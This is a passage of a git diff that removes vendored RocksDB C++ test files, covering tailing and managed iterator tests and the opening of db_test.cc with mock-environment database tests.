-    char buf1[32];
-    char buf2[32];
-    snprintf(buf1, sizeof(buf1), "00a0%016d", i * 5);
-
-    Slice key(buf1, 20);
-    ASSERT_OK(Put(1, key, value));
-
-    if (i % 100 == 99) {
-      ASSERT_OK(Flush(1));
-    }
-
-    snprintf(buf2, sizeof(buf2), "00a0%016d", i * 5 - 2);
-    Slice target(buf2, 20);
-    iter->Seek(target);
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(key), 0);
-    if (i == 1) {
-      itern->SeekToFirst();
-    } else {
-      itern->Next();
-    }
-    ASSERT_TRUE(itern->Valid());
-    ASSERT_EQ(itern->key().compare(key), 0);
-  }
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  for (int i = 2 * num_records; i > 0; --i) {
-    char buf1[32];
-    char buf2[32];
-    snprintf(buf1, sizeof(buf1), "00a0%016d", i * 5);
-
-    Slice key(buf1, 20);
-    ASSERT_OK(Put(1, key, value));
-
-    if (i % 100 == 99) {
-      ASSERT_OK(Flush(1));
-    }
-
-    snprintf(buf2, sizeof(buf2), "00a0%016d", i * 5 - 2);
-    Slice target(buf2, 20);
-    iter->Seek(target);
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(key), 0);
-  }
-}
-
-TEST_F(DBTestTailingIterator, TailingIteratorTrimSeekToNext) {
-  const uint64_t k150KB = 150 * 1024;
-  Options options;
-  options.write_buffer_size = k150KB;
-  options.max_write_buffer_number = 3;
-  options.min_write_buffer_number_to_merge = 2;
-  options.env = env_;
-  CreateAndReopenWithCF({"pikachu"}, options);
-  ReadOptions read_options;
-  read_options.tailing = true;
-  int num_iters, deleted_iters;
-
-  char bufe[32];
-  snprintf(bufe, sizeof(bufe), "00b0%016d", 0);
-  Slice keyu(bufe, 20);
-  read_options.iterate_upper_bound = &keyu;
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options, handles_[1]));
-  std::unique_ptr<Iterator> itern(db_->NewIterator(read_options, handles_[1]));
-  std::unique_ptr<Iterator> iterh(db_->NewIterator(read_options, handles_[1]));
-  std::string value(1024, 'a');
-  bool file_iters_deleted = false;
-  bool file_iters_renewed_null = false;
-  bool file_iters_renewed_copy = false;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "ForwardIterator::SeekInternal:Return", [&](void* arg) {
-        ForwardIterator* fiter = reinterpret_cast<ForwardIterator*>(arg);
-        ASSERT_TRUE(!file_iters_deleted ||
-                    fiter->TEST_CheckDeletedIters(&deleted_iters, &num_iters));
-      });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "ForwardIterator::Next:Return", [&](void* arg) {
-        ForwardIterator* fiter = reinterpret_cast<ForwardIterator*>(arg);
-        ASSERT_TRUE(!file_iters_deleted ||
-                    fiter->TEST_CheckDeletedIters(&deleted_iters, &num_iters));
-      });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "ForwardIterator::RenewIterators:Null",
-      [&](void* arg) { file_iters_renewed_null = true; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "ForwardIterator::RenewIterators:Copy",
-      [&](void* arg) { file_iters_renewed_copy = true; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  const int num_records = 1000;
-  for (int i = 1; i < num_records; ++i) {
-    char buf1[32];
-    char buf2[32];
-    char buf3[32];
-    char buf4[32];
-    snprintf(buf1, sizeof(buf1), "00a0%016d", i * 5);
-    snprintf(buf3, sizeof(buf3), "00b0%016d", i * 5);
-
-    Slice key(buf1, 20);
-    ASSERT_OK(Put(1, key, value));
-    Slice keyn(buf3, 20);
-    ASSERT_OK(Put(1, keyn, value));
-
-    if (i % 100 == 99) {
-      ASSERT_OK(Flush(1));
-      dbfull()->TEST_WaitForCompact();
-      if (i == 299) {
-        file_iters_deleted = true;
-      }
-      snprintf(buf4, sizeof(buf4), "00a0%016d", i * 5 / 2);
-      Slice target(buf4, 20);
-      iterh->Seek(target);
-      ASSERT_TRUE(iter->Valid());
-      for (int j = (i + 1) * 5 / 2; j < i * 5; j += 5) {
-        iterh->Next();
-        ASSERT_TRUE(iterh->Valid());
-      }
-      if (i == 299) {
-        file_iters_deleted = false;
-      }
-    }
-
-    file_iters_deleted = true;
-    snprintf(buf2, sizeof(buf2), "00a0%016d", i * 5 - 2);
-    Slice target(buf2, 20);
-    iter->Seek(target);
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(key), 0);
-    ASSERT_LE(num_iters, 1);
-    if (i == 1) {
-      itern->SeekToFirst();
-    } else {
-      itern->Next();
-    }
-    ASSERT_TRUE(itern->Valid());
-    ASSERT_EQ(itern->key().compare(key), 0);
-    ASSERT_LE(num_iters, 1);
-    file_iters_deleted = false;
-  }
-  ASSERT_TRUE(file_iters_renewed_null);
-  ASSERT_TRUE(file_iters_renewed_copy);
-  iter = 0;
-  itern = 0;
-  iterh = 0;
-  BlockBasedTableOptions table_options;
-  table_options.no_block_cache = true;
-  table_options.block_cache_compressed = nullptr;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  read_options.read_tier = kBlockCacheTier;
-  std::unique_ptr<Iterator> iteri(db_->NewIterator(read_options, handles_[1]));
-  char buf5[32];
-  snprintf(buf5, sizeof(buf5), "00a0%016d", (num_records / 2) * 5 - 2);
-  Slice target1(buf5, 20);
-  iteri->Seek(target1);
-  ASSERT_TRUE(iteri->status().IsIncomplete());
-  iteri = 0;
-
-  read_options.read_tier = kReadAllTier;
-  options.table_factory.reset(NewBlockBasedTableFactory());
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  iter.reset(db_->NewIterator(read_options, handles_[1]));
-  for (int i = 2 * num_records; i > 0; --i) {
-    char buf1[32];
-    char buf2[32];
-    snprintf(buf1, sizeof(buf1), "00a0%016d", i * 5);
-
-    Slice key(buf1, 20);
-    ASSERT_OK(Put(1, key, value));
-
-    if (i % 100 == 99) {
-      ASSERT_OK(Flush(1));
-    }
-
-    snprintf(buf2, sizeof(buf2), "00a0%016d", i * 5 - 2);
-    Slice target(buf2, 20);
-    iter->Seek(target);
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(key), 0);
-  }
-}
-
-TEST_F(DBTestTailingIterator, TailingIteratorDeletes) {
-  CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-  ReadOptions read_options;
-  read_options.tailing = true;
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options, handles_[1]));
-
-  // write a single record, read it using the iterator, then delete it
-  ASSERT_OK(Put(1, "0test", "test"));
-  iter->SeekToFirst();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().ToString(), "0test");
-  ASSERT_OK(Delete(1, "0test"));
-
-  // write many more records
-  const int num_records = 10000;
-  std::string value(1024, 'A');
-
-  for (int i = 0; i < num_records; ++i) {
-    char buf[32];
-    snprintf(buf, sizeof(buf), "1%015d", i);
-
-    Slice key(buf, 16);
-    ASSERT_OK(Put(1, key, value));
-  }
-
-  // force a flush to make sure that no records are read from memtable
-  ASSERT_OK(Flush(1));
-
-  // skip "0test"
-  iter->Next();
-
-  // make sure we can read all new records using the existing iterator
-  int count = 0;
-  for (; iter->Valid(); iter->Next(), ++count) ;
-
-  ASSERT_EQ(count, num_records);
-}
-
-TEST_F(DBTestTailingIterator, TailingIteratorPrefixSeek) {
-  ReadOptions read_options;
-  read_options.tailing = true;
-
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.disable_auto_compactions = true;
-  options.prefix_extractor.reset(NewFixedPrefixTransform(2));
-  options.memtable_factory.reset(NewHashSkipListRepFactory(16));
-  options.allow_concurrent_memtable_write = false;
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options, handles_[1]));
-  ASSERT_OK(Put(1, "0101", "test"));
-
-  ASSERT_OK(Flush(1));
-
-  ASSERT_OK(Put(1, "0202", "test"));
-
-  // Seek(0102) shouldn't find any records since 0202 has a different prefix
-  iter->Seek("0102");
-  ASSERT_TRUE(!iter->Valid());
-
-  iter->Seek("0202");
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().ToString(), "0202");
-
-  iter->Next();
-  ASSERT_TRUE(!iter->Valid());
-}
-
-TEST_F(DBTestTailingIterator, TailingIteratorIncomplete) {
-  CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-  ReadOptions read_options;
-  read_options.tailing = true;
-  read_options.read_tier = kBlockCacheTier;
-
-  std::string key("key");
-  std::string value("value");
-
-  ASSERT_OK(db_->Put(WriteOptions(), key, value));
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options));
-  iter->SeekToFirst();
-  // we either see the entry or it's not in cache
-  ASSERT_TRUE(iter->Valid() || iter->status().IsIncomplete());
-
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  iter->SeekToFirst();
-  // should still be true after compaction
-  ASSERT_TRUE(iter->Valid() || iter->status().IsIncomplete());
-}
-
-TEST_F(DBTestTailingIterator, TailingIteratorSeekToSame) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.write_buffer_size = 1000;
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  ReadOptions read_options;
-  read_options.tailing = true;
-
-  const int NROWS = 10000;
-  // Write rows with keys 00000, 00002, 00004 etc.
-  for (int i = 0; i < NROWS; ++i) {
-    char buf[100];
-    snprintf(buf, sizeof(buf), "%05d", 2*i);
-    std::string key(buf);
-    std::string value("value");
-    ASSERT_OK(db_->Put(WriteOptions(), key, value));
-  }
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options));
-  // Seek to 00001.  We expect to find 00002.
-  std::string start_key = "00001";
-  iter->Seek(start_key);
-  ASSERT_TRUE(iter->Valid());
-
-  std::string found = iter->key().ToString();
-  ASSERT_EQ("00002", found);
-
-  // Now seek to the same key.  The iterator should remain in the same
-  // position.
-  iter->Seek(found);
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(found, iter->key().ToString());
-}
-
-// Sets iterate_upper_bound and verifies that ForwardIterator doesn't call
-// Seek() on immutable iterators when target key is >= prev_key and all
-// iterators, including the memtable iterator, are over the upper bound.
-TEST_F(DBTestTailingIterator, TailingIteratorUpperBound) {
-  CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-
-  const Slice upper_bound("20", 3);
-  ReadOptions read_options;
-  read_options.tailing = true;
-  read_options.iterate_upper_bound = &upper_bound;
-
-  ASSERT_OK(Put(1, "11", "11"));
-  ASSERT_OK(Put(1, "12", "12"));
-  ASSERT_OK(Put(1, "22", "22"));
-  ASSERT_OK(Flush(1));  // flush all those keys to an immutable SST file
-
-  // Add another key to the memtable.
-  ASSERT_OK(Put(1, "21", "21"));
-
-  std::unique_ptr<Iterator> it(db_->NewIterator(read_options, handles_[1]));
-  it->Seek("12");
-  ASSERT_TRUE(it->Valid());
-  ASSERT_EQ("12", it->key().ToString());
-
-  it->Next();
-  // Not valid since "21" is over the upper bound.
-  ASSERT_FALSE(it->Valid());
-
-  // This keeps track of the number of times NeedToSeekImmutable() was true.
-  int immutable_seeks = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "ForwardIterator::SeekInternal:Immutable",
-      [&](void* arg) { ++immutable_seeks; });
-
-  // Seek to 13. This should not require any immutable seeks.
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  it->Seek("13");
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  ASSERT_FALSE(it->Valid());
-  ASSERT_EQ(0, immutable_seeks);
-}
-
-TEST_F(DBTestTailingIterator, TailingIteratorGap) {
-  // level 1:            [20, 25]  [35, 40]
-  // level 2:  [10 - 15]                    [45 - 50]
-  // level 3:            [20,    30,    40]
-  // Previously there is a bug in tailing_iterator that if there is a gap in
-  // lower level, the key will be skipped if it is within the range between
-  // the largest key of index n file and the smallest key of index n+1 file
-  // if both file fit in that gap. In this example, 25 < key < 35
-  // https://github.com/facebook/rocksdb/issues/1372
-  CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-
-  ReadOptions read_options;
-  read_options.tailing = true;
-
-  ASSERT_OK(Put(1, "20", "20"));
-  ASSERT_OK(Put(1, "30", "30"));
-  ASSERT_OK(Put(1, "40", "40"));
-  ASSERT_OK(Flush(1));
-  MoveFilesToLevel(3, 1);
-
-  ASSERT_OK(Put(1, "10", "10"));
-  ASSERT_OK(Put(1, "15", "15"));
-  ASSERT_OK(Flush(1));
-  ASSERT_OK(Put(1, "45", "45"));
-  ASSERT_OK(Put(1, "50", "50"));
-  ASSERT_OK(Flush(1));
-  MoveFilesToLevel(2, 1);
-
-  ASSERT_OK(Put(1, "20", "20"));
-  ASSERT_OK(Put(1, "25", "25"));
-  ASSERT_OK(Flush(1));
-  ASSERT_OK(Put(1, "35", "35"));
-  ASSERT_OK(Put(1, "40", "40"));
-  ASSERT_OK(Flush(1));
-  MoveFilesToLevel(1, 1);
-
-  ColumnFamilyMetaData meta;
-  db_->GetColumnFamilyMetaData(handles_[1], &meta);
-
-  std::unique_ptr<Iterator> it(db_->NewIterator(read_options, handles_[1]));
-  it->Seek("30");
-  ASSERT_TRUE(it->Valid());
-  ASSERT_EQ("30", it->key().ToString());
-
-  it->Next();
-  ASSERT_TRUE(it->Valid());
-  ASSERT_EQ("35", it->key().ToString());
-
-  it->Next();
-  ASSERT_TRUE(it->Valid());
-  ASSERT_EQ("40", it->key().ToString());
-}
-
-TEST_F(DBTestTailingIterator, ManagedTailingIteratorSingle) {
-  ReadOptions read_options;
-  read_options.tailing = true;
-  read_options.managed = true;
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options));
-  iter->SeekToFirst();
-  ASSERT_TRUE(!iter->Valid());
-
-  // add a record and check that iter can see it
-  ASSERT_OK(db_->Put(WriteOptions(), "mirko", "fodor"));
-  iter->SeekToFirst();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().ToString(), "mirko");
-
-  iter->Next();
-  ASSERT_TRUE(!iter->Valid());
-}
-
-TEST_F(DBTestTailingIterator, ManagedTailingIteratorKeepAdding) {
-  CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-  ReadOptions read_options;
-  read_options.tailing = true;
-  read_options.managed = true;
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options, handles_[1]));
-  std::string value(1024, 'a');
-
-  const int num_records = 10000;
-  for (int i = 0; i < num_records; ++i) {
-    char buf[32];
-    snprintf(buf, sizeof(buf), "%016d", i);
-
-    Slice key(buf, 16);
-    ASSERT_OK(Put(1, key, value));
-
-    iter->Seek(key);
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(key), 0);
-  }
-}
-
-TEST_F(DBTestTailingIterator, ManagedTailingIteratorSeekToNext) {
-  CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-  ReadOptions read_options;
-  read_options.tailing = true;
-  read_options.managed = true;
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options, handles_[1]));
-  std::string value(1024, 'a');
-
-  const int num_records = 1000;
-  for (int i = 1; i < num_records; ++i) {
-    char buf1[32];
-    char buf2[32];
-    snprintf(buf1, sizeof(buf1), "00a0%016d", i * 5);
-
-    Slice key(buf1, 20);
-    ASSERT_OK(Put(1, key, value));
-
-    if (i % 100 == 99) {
-      ASSERT_OK(Flush(1));
-    }
-
-    snprintf(buf2, sizeof(buf2), "00a0%016d", i * 5 - 2);
-    Slice target(buf2, 20);
-    iter->Seek(target);
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(key), 0);
-  }
-  for (int i = 2 * num_records; i > 0; --i) {
-    char buf1[32];
-    char buf2[32];
-    snprintf(buf1, sizeof(buf1), "00a0%016d", i * 5);
-
-    Slice key(buf1, 20);
-    ASSERT_OK(Put(1, key, value));
-
-    if (i % 100 == 99) {
-      ASSERT_OK(Flush(1));
-    }
-
-    snprintf(buf2, sizeof(buf2), "00a0%016d", i * 5 - 2);
-    Slice target(buf2, 20);
-    iter->Seek(target);
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(key), 0);
-  }
-}
-
-TEST_F(DBTestTailingIterator, ManagedTailingIteratorDeletes) {
-  CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-  ReadOptions read_options;
-  read_options.tailing = true;
-  read_options.managed = true;
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options, handles_[1]));
-
-  // write a single record, read it using the iterator, then delete it
-  ASSERT_OK(Put(1, "0test", "test"));
-  iter->SeekToFirst();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().ToString(), "0test");
-  ASSERT_OK(Delete(1, "0test"));
-
-  // write many more records
-  const int num_records = 10000;
-  std::string value(1024, 'A');
-
-  for (int i = 0; i < num_records; ++i) {
-    char buf[32];
-    snprintf(buf, sizeof(buf), "1%015d", i);
-
-    Slice key(buf, 16);
-    ASSERT_OK(Put(1, key, value));
-  }
-
-  // force a flush to make sure that no records are read from memtable
-  ASSERT_OK(Flush(1));
-
-  // skip "0test"
-  iter->Next();
-
-  // make sure we can read all new records using the existing iterator
-  int count = 0;
-  for (; iter->Valid(); iter->Next(), ++count) {
-  }
-
-  ASSERT_EQ(count, num_records);
-}
-
-TEST_F(DBTestTailingIterator, ManagedTailingIteratorPrefixSeek) {
-  ReadOptions read_options;
-  read_options.tailing = true;
-  read_options.managed = true;
-
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.disable_auto_compactions = true;
-  options.prefix_extractor.reset(NewFixedPrefixTransform(2));
-  options.memtable_factory.reset(NewHashSkipListRepFactory(16));
-  options.allow_concurrent_memtable_write = false;
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options, handles_[1]));
-  ASSERT_OK(Put(1, "0101", "test"));
-
-  ASSERT_OK(Flush(1));
-
-  ASSERT_OK(Put(1, "0202", "test"));
-
-  // Seek(0102) shouldn't find any records since 0202 has a different prefix
-  iter->Seek("0102");
-  ASSERT_TRUE(!iter->Valid());
-
-  iter->Seek("0202");
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().ToString(), "0202");
-
-  iter->Next();
-  ASSERT_TRUE(!iter->Valid());
-}
-
-TEST_F(DBTestTailingIterator, ManagedTailingIteratorIncomplete) {
-  CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-  ReadOptions read_options;
-  read_options.tailing = true;
-  read_options.managed = true;
-  read_options.read_tier = kBlockCacheTier;
-
-  std::string key = "key";
-  std::string value = "value";
-
-  ASSERT_OK(db_->Put(WriteOptions(), key, value));
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options));
-  iter->SeekToFirst();
-  // we either see the entry or it's not in cache
-  ASSERT_TRUE(iter->Valid() || iter->status().IsIncomplete());
-
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  iter->SeekToFirst();
-  // should still be true after compaction
-  ASSERT_TRUE(iter->Valid() || iter->status().IsIncomplete());
-}
-
-TEST_F(DBTestTailingIterator, ManagedTailingIteratorSeekToSame) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.write_buffer_size = 1000;
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  ReadOptions read_options;
-  read_options.tailing = true;
-  read_options.managed = true;
-
-  const int NROWS = 10000;
-  // Write rows with keys 00000, 00002, 00004 etc.
-  for (int i = 0; i < NROWS; ++i) {
-    char buf[100];
-    snprintf(buf, sizeof(buf), "%05d", 2 * i);
-    std::string key(buf);
-    std::string value("value");
-    ASSERT_OK(db_->Put(WriteOptions(), key, value));
-  }
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options));
-  // Seek to 00001.  We expect to find 00002.
-  std::string start_key = "00001";
-  iter->Seek(start_key);
-  ASSERT_TRUE(iter->Valid());
-
-  std::string found = iter->key().ToString();
-  ASSERT_EQ("00002", found);
-
-  // Now seek to the same key.  The iterator should remain in the same
-  // position.
-  iter->Seek(found);
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(found, iter->key().ToString());
-}
-
-TEST_F(DBTestTailingIterator, ForwardIteratorVersionProperty) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 1000;
-
-  ReadOptions read_options;
-  read_options.tailing = true;
-
-  Put("foo", "bar");
-
-  uint64_t v1, v2, v3, v4;
-  {
-    std::unique_ptr<Iterator> iter(db_->NewIterator(read_options));
-    iter->Seek("foo");
-    std::string prop_value;
-    ASSERT_OK(iter->GetProperty("rocksdb.iterator.super-version-number",
-                                &prop_value));
-    v1 = static_cast<uint64_t>(std::atoi(prop_value.c_str()));
-
-    Put("foo1", "bar1");
-    Flush();
-
-    ASSERT_OK(iter->GetProperty("rocksdb.iterator.super-version-number",
-                                &prop_value));
-    v2 = static_cast<uint64_t>(std::atoi(prop_value.c_str()));
-
-    iter->Seek("f");
-
-    ASSERT_OK(iter->GetProperty("rocksdb.iterator.super-version-number",
-                                &prop_value));
-    v3 = static_cast<uint64_t>(std::atoi(prop_value.c_str()));
-
-    ASSERT_EQ(v1, v2);
-    ASSERT_GT(v3, v2);
-  }
-
-  {
-    std::unique_ptr<Iterator> iter(db_->NewIterator(read_options));
-    iter->Seek("foo");
-    std::string prop_value;
-    ASSERT_OK(iter->GetProperty("rocksdb.iterator.super-version-number",
-                                &prop_value));
-    v4 = static_cast<uint64_t>(std::atoi(prop_value.c_str()));
-  }
-  ASSERT_EQ(v3, v4);
-}
-
-TEST_F(DBTestTailingIterator, SeekWithUpperBoundBug) {
-  ReadOptions read_options;
-  read_options.tailing = true;
-  const Slice upper_bound("cc", 3);
-  read_options.iterate_upper_bound = &upper_bound;
-
-
-  // 1st L0 file
-  ASSERT_OK(db_->Put(WriteOptions(), "aa", "SEEN"));
-  ASSERT_OK(Flush());
-
-  // 2nd L0 file
-  ASSERT_OK(db_->Put(WriteOptions(), "zz", "NOT-SEEN"));
-  ASSERT_OK(Flush());
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options));
-
-  iter->Seek("aa");
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().ToString(), "aa");
-}
-
-TEST_F(DBTestTailingIterator, SeekToFirstWithUpperBoundBug) {
-  ReadOptions read_options;
-  read_options.tailing = true;
-  const Slice upper_bound("cc", 3);
-  read_options.iterate_upper_bound = &upper_bound;
-
-
-  // 1st L0 file
-  ASSERT_OK(db_->Put(WriteOptions(), "aa", "SEEN"));
-  ASSERT_OK(Flush());
-
-  // 2nd L0 file
-  ASSERT_OK(db_->Put(WriteOptions(), "zz", "NOT-SEEN"));
-  ASSERT_OK(Flush());
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options));
-
-  iter->SeekToFirst();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().ToString(), "aa");
-
-  iter->Next();
-  ASSERT_FALSE(iter->Valid());
-
-  iter->SeekToFirst();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().ToString(), "aa");
-}
-
-}  // namespace rocksdb
-
-#endif  // !defined(ROCKSDB_LITE)
-
-int main(int argc, char** argv) {
-#if !defined(ROCKSDB_LITE)
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-#else
-  return 0;
-#endif
-}
diff --git a/thirdparty/rocksdb/db/db_test.cc b/thirdparty/rocksdb/db/db_test.cc
deleted file mode 100644
index 193101d..0000000
--- a/thirdparty/rocksdb/db/db_test.cc
+++ /dev/null
@@ -1,5498 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-// Introduction of SyncPoint effectively disabled building and running this test
-// in Release build.
-// which is a pity, it is a good test
-#include <fcntl.h>
-#include <algorithm>
-#include <set>
-#include <thread>
-#include <unordered_set>
-#include <utility>
-#ifndef OS_WIN
-#include <unistd.h>
-#endif
-#ifdef OS_SOLARIS
-#include <alloca.h>
-#endif
-
-#include "cache/lru_cache.h"
-#include "db/db_impl.h"
-#include "db/db_test_util.h"
-#include "db/dbformat.h"
-#include "db/job_context.h"
-#include "db/version_set.h"
-#include "db/write_batch_internal.h"
-#include "env/mock_env.h"
-#include "memtable/hash_linklist_rep.h"
-#include "monitoring/thread_status_util.h"
-#include "port/port.h"
-#include "port/stack_trace.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/experimental.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/options.h"
-#include "rocksdb/perf_context.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/snapshot.h"
-#include "rocksdb/table.h"
-#include "rocksdb/table_properties.h"
-#include "rocksdb/thread_status.h"
-#include "rocksdb/utilities/checkpoint.h"
-#include "rocksdb/utilities/optimistic_transaction_db.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-#include "table/block_based_table_factory.h"
-#include "table/mock_table.h"
-#include "table/plain_table_factory.h"
-#include "table/scoped_arena_iterator.h"
-#include "util/compression.h"
-#include "util/file_reader_writer.h"
-#include "util/filename.h"
-#include "util/hash.h"
-#include "util/mutexlock.h"
-#include "util/rate_limiter.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "utilities/merge_operators.h"
-
-namespace rocksdb {
-
-class DBTest : public DBTestBase {
- public:
-  DBTest() : DBTestBase("/db_test") {}
-};
-
-class DBTestWithParam
-    : public DBTest,
-      public testing::WithParamInterface<std::tuple<uint32_t, bool>> {
- public:
-  DBTestWithParam() {
-    max_subcompactions_ = std::get<0>(GetParam());
-    exclusive_manual_compaction_ = std::get<1>(GetParam());
-  }
-
-  // Required if inheriting from testing::WithParamInterface<>
-  static void SetUpTestCase() {}
-  static void TearDownTestCase() {}
-
-  uint32_t max_subcompactions_;
-  bool exclusive_manual_compaction_;
-};
-
-TEST_F(DBTest, MockEnvTest) {
-  unique_ptr<MockEnv> env{new MockEnv(Env::Default())};
-  Options options;
-  options.create_if_missing = true;
-  options.env = env.get();
-  DB* db;
-
-  const Slice keys[] = {Slice("aaa"), Slice("bbb"), Slice("ccc")};
-  const Slice vals[] = {Slice("foo"), Slice("bar"), Slice("baz")};
-
-  ASSERT_OK(DB::Open(options, "/dir/db", &db));
-  for (size_t i = 0; i < 3; ++i) {
-    ASSERT_OK(db->Put(WriteOptions(), keys[i], vals[i]));
-  }
-
-  for (size_t i = 0; i < 3; ++i) {
-    std::string res;
-    ASSERT_OK(db->Get(ReadOptions(), keys[i], &res));
-    ASSERT_TRUE(res == vals[i]);
-  }
-
-  Iterator* iterator = db->NewIterator(ReadOptions());
-  iterator->SeekToFirst();
-  for (size_t i = 0; i < 3; ++i) {
-    ASSERT_TRUE(iterator->Valid());
-    ASSERT_TRUE(keys[i] == iterator->key());
-    ASSERT_TRUE(vals[i] == iterator->value());
-    iterator->Next();
-  }
-  ASSERT_TRUE(!iterator->Valid());
-  delete iterator;
-
-// TEST_FlushMemTable() is not supported in ROCKSDB_LITE
-#ifndef ROCKSDB_LITE
-  DBImpl* dbi = reinterpret_cast<DBImpl*>(db);
-  ASSERT_OK(dbi->TEST_FlushMemTable());
-
-  for (size_t i = 0; i < 3; ++i) {
-    std::string res;
-    ASSERT_OK(db->Get(ReadOptions(), keys[i], &res));
-    ASSERT_TRUE(res == vals[i]);
-  }
-#endif  // ROCKSDB_LITE
-
-  delete db;
-}
-
-// NewMemEnv returns nullptr in ROCKSDB_LITE since class InMemoryEnv isn't
-// defined.
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, MemEnvTest) {
-  unique_ptr<Env> env{NewMemEnv(Env::Default())};
-  Options options;
-  options.create_if_missing = true;
-  options.env = env.get();
-  DB* db;
-
-  const Slice keys[] = {Slice("aaa"), Slice("bbb"), Slice("ccc")};
-  const Slice vals[] = {Slice("foo"), Slice("bar"), Slice("baz")};
-
-  ASSERT_OK(DB::Open(options, "/dir/db", &db));
-  for (size_t i = 0; i < 3; ++i) {
-    ASSERT_OK(db->Put(WriteOptions(), keys[i], vals[i]));
-  }
-
-  for (size_t i = 0; i < 3; ++i) {
-    std::string res;
-    ASSERT_OK(db->Get(ReadOptions(), keys[i], &res));
-    ASSERT_TRUE(res == vals[i]);
-  }
-
-  Iterator* iterator = db->NewIterator(ReadOptions());
-  iterator->SeekToFirst();
-  for (size_t i = 0; i < 3; ++i) {
-    ASSERT_TRUE(iterator->Valid());
-    ASSERT_TRUE(keys[i] == iterator->key());
-    ASSERT_TRUE(vals[i] == iterator->value());
-    iterator->Next();
-  }
-  ASSERT_TRUE(!iterator->Valid());
-  delete iterator;
-
-  DBImpl* dbi = reinterpret_cast<DBImpl*>(db);
-  ASSERT_OK(dbi->TEST_FlushMemTable());
-
-  for (size_t i = 0; i < 3; ++i) {
-    std::string res;
